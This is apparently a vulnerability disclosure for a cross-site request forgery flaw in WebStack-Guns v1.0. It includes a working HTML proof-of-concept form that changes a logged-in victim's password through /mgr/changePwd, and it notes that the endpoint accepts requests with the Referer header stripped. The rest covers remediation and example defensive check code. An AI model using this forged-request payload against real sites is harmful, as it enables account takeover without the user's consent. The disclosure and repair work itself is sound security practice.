| Field | Value |
|---|---|
| Title | jsnjfz WebStack-Guns V1.0 Cross-Site Request Forgery |
| Description | WebStack-Guns v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /mgr/changePwd. |
# **NAME OF AFFECTED PRODUCT(S)**
- WebStack-Guns
## Vendor Homepage
https://github.com/jsnjfz/WebStack-Guns
# **AFFECTED AND/OR FIXED VERSION(S)**
## Submitter
- aiyakami, Yveslawtox, luokuang1
## Vulnerable File
- UserMgrController.java
## VERSION(S)
- V1.0
## Software Link
- https://github.com/jsnjfz/WebStack-Guns
# **PROBLEM TYPE**
## Vulnerability Type
- CSRF (Cross-Site Request Forgery)
## Root Cause
- The application does not verify that requests which change user-sensitive data (e.g., account settings, password changes) actually originate from its own pages. An attacker can trick a logged-in user into submitting a forged request, which is then executed with that user's privileges, altering sensitive data or performing unwanted actions without the user's consent.
## Impact
- Attackers can make authenticated users perform actions such as changing their password or modifying account settings, all without the user's consent.
Successful exploitation can lead to:
- Unauthorized account access or data manipulation.
- Privilege escalation or unauthorized actions performed on behalf of the user.
- Potential data loss or unauthorized data leakage.
# **DESCRIPTION**
- During a security audit of WebStack-Guns, a critical CSRF vulnerability was identified in the UserMgrController.java file. The vulnerability allows an attacker to craft a malicious request that, when submitted by a logged-in user, executes unintended actions such as a password change or profile update.
# **Vulnerability details and POC**
## Vulnerable Location:
- `UserMgrController.java`
## Payload:
Example: an attacker hosts the following page; when a logged-in user loads it, the form submits a request that changes the victim's password without their consent.
```html
<html>
<body>
<form action="http://localhost:8000/mgr/changePwd?jstime=1747794048307" method="POST" name="form1" enctype="application/x-www-form-urlencoded" >
<input type="hidden" name="rePwd" value="123456"/>
<input type="hidden" name="oldPwd" value="111111"/>
<input type="hidden" name="newPwd" value="123456"/>
<input type="submit" value="Submit request" />
</form>
<script>history.pushState('', '', '/');</script>
</body>
</html>
```
## Testing notes (from screenshots taken while testing with the yakit tool):
After removing the Referer header from the captured request and resending it, the server still accepts the request, so Referer checking does not protect this endpoint.

# Suggested repair
1. **Anti-CSRF Tokens**
   Implement anti-CSRF tokens in all state-changing forms or actions (e.g., POST requests), so that the server can check that each request originates from a legitimate source.
2. **SameSite Cookies**
   Ensure that cookies carry the SameSite attribute set to Strict or Lax to mitigate cross-site request forgery attempts from other origins.
3. **Referer Header Validation**
   Validate the Referer header for sensitive actions to ensure the request comes from a trusted origin.
4. **Double Submit Cookies**
   Use a second cookie that stores the CSRF token and verify that its value matches the token submitted with the form.

## Recommended Fix
- Integrate an anti-CSRF solution (e.g., tokens, SameSite cookies) in all forms that involve state changes.
- Ensure that sensitive actions require additional user verification (e.g., re-entering the current password).
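As an added illustration of repairs 1, 3 and 4 above (example code written for this page, not the project's own Java code), here is the check a handler for POST /mgr/changePwd can apply before touching the password, shown language-agnostically in Python. The site origin, cookie name and token field name are assumed; the forged submission in the usage is the PoC form's fields.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed values for this example (not from the project): UI origin, cookie and field names.
SITE_ORIGIN = "http://localhost:8000"
CSRF_COOKIE = "XSRF-TOKEN"
CSRF_FIELD = "_csrf"


def issue_token(session: dict) -> str:
    """Synchronizer token: bind a fresh random value to the server-side session."""
    token = secrets.token_urlsafe(32)
    session[CSRF_FIELD] = token
    return token


def request_is_same_origin(headers: dict) -> bool:
    """Origin/Referer check. A request carrying neither header is not trusted,
    which is what closes the 'strip the Referer and resend' observation above."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def csrf_check(session: dict, headers: dict, cookies: dict, form: dict) -> bool:
    """Accept only if the form token equals the session token (synchronizer token),
    the double-submit cookie carries the same value, and the source is same-origin."""
    expected = session.get(CSRF_FIELD, "")
    submitted = form.get(CSRF_FIELD, "")
    if not expected or not submitted:
        return False
    # constant-time comparisons so a mismatch does not leak token bytes via timing
    if not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    if not hmac.compare_digest(cookies.get(CSRF_COOKIE, "").encode(), submitted.encode()):
        return False
    return request_is_same_origin(headers)


def change_password(session: dict, headers: dict, cookies: dict, form: dict) -> tuple:
    """Handler for POST /mgr/changePwd that refuses to act without valid CSRF proof."""
    if not csrf_check(session, headers, cookies, form):
        return 403, "CSRF check failed"
    if form.get("newPwd") != form.get("rePwd"):
        return 400, "passwords do not match"
    return 200, "password changed"  # the real password update would happen here
```

With this in place the PoC form (rePwd, oldPwd, newPwd only, no token, foreign or absent Origin/Referer) is rejected with 403, while a form rendered by the application, carrying the session-bound token in both the field and the cookie, is accepted.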
| Field | Value |
|---|---|
| Source | https://github.com/Aiyakami/CVE-1/issues/5 |
| User | aiyakami (UID 85128) |
| Submission | 05/21/2025 04:53 AM (2 months ago) |
| Moderation | 06/09/2025 08:10 AM (19 days later) |
| Status | Accepted |
| VulDB Entry | 311659 [jsnjfz WebStack-Guns 1.0 cross-site request forgery] |
| Points | 20 |